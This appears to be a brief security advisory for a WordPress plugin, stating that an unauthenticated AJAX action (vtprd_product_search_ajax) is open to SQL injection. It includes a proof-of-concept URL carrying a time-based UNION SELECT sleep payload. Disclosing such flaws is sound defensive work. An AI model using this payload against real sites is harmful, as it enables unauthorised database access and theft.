The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection
https://examle.com/wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%'+union+select+1,sleep(5),3%23'